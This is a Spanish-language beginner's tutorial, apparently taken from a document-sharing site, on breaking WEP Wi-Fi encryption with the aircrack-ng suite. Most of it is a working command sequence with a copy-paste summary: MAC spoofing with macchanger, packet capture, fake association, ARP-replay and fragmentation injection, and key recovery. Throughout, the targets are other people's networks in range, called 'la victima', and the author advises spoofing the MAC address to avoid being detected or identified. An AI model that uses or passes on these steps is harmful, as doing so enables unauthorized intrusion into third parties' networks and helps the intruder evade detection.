You are on page 1of 6

TUTORIAL CLAVES WEP aircrack

Wenas pea aqu les dejo un tuto que espero les ayude mucho y para aquellos que tienen linux ya sea ubuntu o cualquier versin pueden conseguir aircrack desde una shell fcilmente: Abre una ventana de terminal (o consola) y escribe lo siguiente: apt-get install aircrack-ng Y para cambiar tu mac necesitas: apt-get install macchanger OK pues nada, ahora lo bueno espero que les guste y les ayude mucho, Voy a ponerlo por pasos porque tendremos que volver para atrs desde el paso n5 para poner una mac creble o que ya este asociada con el router. Paso 1 abre una ventana de terminal y escribe lo siguiente: airmon-ng Aqu te va a decir cual es tu tarjeta inalmbrica, lo normal es que salga wlan0, o eth0, o eth1, cosas as por el estilo, tu te vas a dar cuenta de cual es la tuya, en mi caso es la wlan0 as que es la que voy a usar, tu utiliza la tuya ok. Paso 2 introduce los siguientes comandos: airmon-ng stop wlan0 ifconfig wlan0 down Con esto deshabilitas la tarjeta de red inalmbrica para hacerle un cambio de mac, si esta habilitada no te dejara cambiar de mac, cambiaras tu mac por dos razones importantes: 1. Para que as no haya problemas de que te puedan detectar e impedirte futuras conexiones. 2. Con tu mac real pueden llegar hasta ti, tu nombre, tus datos y eso no mola nada. Paso 3 para cambiar la mac escribe los siguientes comandos: macchanger --mac 00:11:22:33:44:55 wlan0 (esta mac no es solo un ejemplo sirve) Lo malo que ltimamente da problemas por eso en el paso 5 tendremos que volver al paso 2 y seguir de nuevo Paso 4 habilita tu tarjeta:

airmon-ng start wlan0 Con el paso 3 se cambio la mac de tu tarjeta de red por 00:11:22:33:44:55 y con el paso 4 habilitaste nuevamente tu tarjeta de red inalmbrica Paso 5 ahora vas a proceder a ver las redes inalmbricas que estn a tu alcance con el siguiente comando: airodump-ng wlan0 Va a salir la lista de las redes inalmbricas, donde dice el BSSID (mac del router que da la seal), PWR (Poder de seal cuanto mas bajo mejor ej: -10 es mas furte que -80), CHN (Canal que se encuentra la red), ENCR (Es el tipo de contrasea que tiene la red, este tutorial es solo para WEP) ESSID (Nombre de la red inalambrica) STATION ( es la mac del pc que esta conectado al router) Se que son mas datos los que se muestran, pero esos no son de importancia, solo vamos a utilizar los que mencione. Cuando selecciones la red inalmbrica que vamos a atacar aprieta Ctrl + C para parar el proceso y con el mouse sombrea todo el BSSID de esa red y dale click derecho y copiar y lo pegamos en un documento de texto y hacemos lo mismo con la station y volvemos al paso 2.

Para explicar bien esta parte vamos a poner un ejemplo:

STATION 00:11:22:33:44:55 BSSID 66:77:88:99:00:11 CHN 6 ESSID JAZZTEL_70 o la que sea estos datos son los que usaremos, en este punto copiamos la station que es la mac del pc asociada ya con ese router y volvemos al paso 2 para cambiar nuestra mac por esta que es la que funciona seguro, Paso 6 ahora para ponernos de modo monitor (para capturar paquetes) de esa red pon el siguiente comando: airodump-ng -c 6 -w prueba --bssid 66:77:88:99:00:11 wlan0 Donde: -c es el numero del canal de la red que estamos atacando -w es el archivo donde se van a guardar los paquetes que captures (por defecto estn en la direccin /root) --bssid es la mac del router de la red que estamos atacando wlan0 es nuestra tarjeta inalmbrica STATION es la mac del pc que esta conectado al bssid esta mac es la que hay que usar para asociar 100% Ahora que ya estas capturando datos veras que hay una parte que dice DATA, estos son los paquetes que llevamos capturados o no, si no captura paquetes DATA es que no hay ningun pc conectado al ruoter para poder descifrar una clave wep es necesario 20,000 paquetes o mas. Si no esta generando trafico y te podra llevar das incluso semanas llegar a los 20,000 paquetes, Pero no te preocupes que ahora te enseare como generar trfico en la red. Paso 7 para asociarte abre otra terminal (consola) donde introducirs los siguientes comandos: aireplay-ng -1 0 -a 66:77:88:99:00:11 -h 00:11:22:33:44:55 -e ejemplo wlan0 Donde: -a es el bssid de la red que estamos atacando -h es la mac falsa que le introducimos a tu tarjeta de red inalmbrica -e es el nombre de la red que estamos atacando Luego cuando salgan 4 lneas de cdigos y te diga que la conexin esta succesfull, esto significa que estas conectado en capa 2 al router de la red que estamos atacando. Si por alguna razn no se puede conectar (unsuccesfull) algunas de las razones son las siguientes: -La red a la que quieres atacar esta muy lejos, aconsejo que tengas mnimo de tres rallas de seal.

-Tu tarjeta de red no puede hacer inyeccin de paquetes. -El router tiene seguridad para evitar este tipo de ataques. Paso 8 ahora para inyectarle el trafico introduce el siguientes comando: aireplay-ng -3 -b 66:77:88:99:00:11 -h 00:11:22:33:44:55 wlan0 Donde: -b es el bssid de la red que estamos atacando -h es la mac falsa que le introducimos a tu tarjeta de red inalmbrica Veras que se empezaron a inyectar paquetes, si vas a ver a la otra terminal donde estas capturando los paquetes te dars cuenta que la DATA va caminando muy rpido. Paso 9 ahora abre otra terminal (consola) aqu es donde vamos a ejecutar el ataque final que es utilizar los datos capturados para buscar la contrasea e introduce los siguientes comandos cdigo: aircrack-ng prueba-01.cap Y tambin puedes usar este que une todos los paquetes, cdigo: aircrack-ng *.cap EJ: -01.cap, -02.cap, -03.cap esto es por si dejas el ataque para otro momento o si en el paso de inyectar le diste a ctrl.+c y vuelves a intentarlo ya no te crea el -01.cap te creara el -02.cap as los juntas y no pierdes ese paquete) Donde: -Prueba-01.cap es el archivo donde se estn capturando los datos Deja que el comando se ejecute hasta que te diga un mensaje KEY FOUND!!, esto significa que la contrasea se a descifrado, y te la mostrara al lado derecho de la siguiente forma: Key found [XX:XX:XX:XX:XX:XX] Donde las XX son las letras o nmeros de la contrasea, por ejemplo: Si te muestra [12:34:56:78:90] La contrasea para esa red inalmbrica seria 1234567890. Bueno para aquellos que quieren probar aqu les pongo todos los comandos en el orden que debe de ser para que solo le den copiar:

Paso 1 # airmon-ng Paso 2 # airmon-ng stop wlan0 # ifconfig wlan0 down paso3 # macchanger mac 00:11:22:33:44:55 wlan0 paso 4 # airmon-ng start wlan0 paso 5 # airodump-ng wlan0 ( aqu cogeremos la estation del bssid que atacamos y volvemos al paso 2 si no hay ninguna station con nuestra bssid cogemos la que sea porque por lo menos sera real y dar menos problemas. # airodump-ng -c (numero del canal) -w nombrearchivo bssid (bssid) wlan0 # aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0 # aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0 # aircrack-ng nombredelarchivo.cap Como se darn cuenta son pocos comandos pero llevan mucha explicacin y lo trate de hacer de una forma entendible Para aquellos que quieren probar otras formas de inyeccin aqu les dejo otras dos formas que me han funcionado perfecto. Forma 2: # aireplay-ng -1 0 -a <bssid> -h <mac> -e <essid> wlan0 # aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -h (MAC) wlan0 Verificar si el BSSID es el que estamos atacando Forma 3: # aireplay-ng -1 0 -a <bssid> -h <mac> -e <essid> wlan0 # aireplay-ng -5 -b <BSSID> -h <mac> wlan0 Ver como se llama el archivo .xor # packetforge-ng -0 -a <BSSID> -h <mac> -k 255.255.255.255 -l 255.255.255.255 -y <archivo .xor> w ARP # aireplay-ng -2 -r ARP wlan0 Solo aclarar que este tuto es para novatos, por lo que para alguien con algo de experiencia no tiene que pasar del paso 5 al 2 y seguir Bastara con saltarse algunos pasos EJ: airmon-ng start wlan0 airodump-ng wlan0 escogemos la mac y la station pulsamos ctrl+c para parar todo las copiamos y recordamos el canal CH ej: 3, airmon-ng stop wlan0

ifconfig wlano down macchanger mac 0B:A1:89:10:26:B0 wlan0 airodump-ng wlan0 c 3 (como ves ahora si que he puesto el canal para eliminar distracciones y centrarnos en la victima) airodump-ng -c (numero del canal) -w nombrearchivo bssid (bssid) wlan0 aireplay-ng -1 0 -a (bssid) -h 0B:A1:89:10:26:B0 -e (essid) wlan0 aireplay-ng -3 -b (bssid) -h 0B:A1:89:10:26:B0 wlan0 aircrack-ng nombredelarchivo.cap

You might also like